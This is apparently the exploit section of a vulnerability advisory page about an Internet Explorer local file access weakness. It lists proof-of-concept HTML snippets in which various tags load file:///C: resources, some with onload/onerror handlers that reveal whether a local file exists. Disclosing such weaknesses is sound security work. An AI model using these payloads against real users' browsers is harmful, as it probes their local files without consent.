• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer Local File Access Weakness

An attacker may exploit these issues by enticing victims into viewing malicious HTML content.

The following proof-of-concept HTML code is available:

- Embed Tag Local file Access:

<EMBED SRC="file:///C:/example.pdf" HEIGHT=600 WIDTH=1440></EMBED>

- Object & Param Tag Local File Access:

<object type="audio/x-mid" data="file:///C:/example.mid" width="200"
height="20">
<param name="src" value="file:///C:/example.mid">
<param name="autoStart" value="true">
<param name="autoStart" value="0">
</object>

- Body Tag Local File Access:

<body background="file:///C:/example.gif" onload="alert('loading body
bgrd success')" onerror="alert('loading body bgrd error')">

- Style Tag Local File Access:

<STYLE type="text/css">BODY{background:url("file:///C:/example.gif")}
</STYLE>

- Bgsound Tag Local File Access:

<bgsound src="file:///C:/example.mid" id="soundeffect" loop=1 autostart=
"true"/>

- Input Tag Local File Access:

<form>
<input type="image" src="file:///C:/example.gif" onload="alert('loading
input success')" onerror="alert('loading input error')">
</form>

- Image Tag Local File Access:

<img src="file:///C:/example.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">

- Script Tag Local File Access:

<script src="file:///C:/example.js"></script>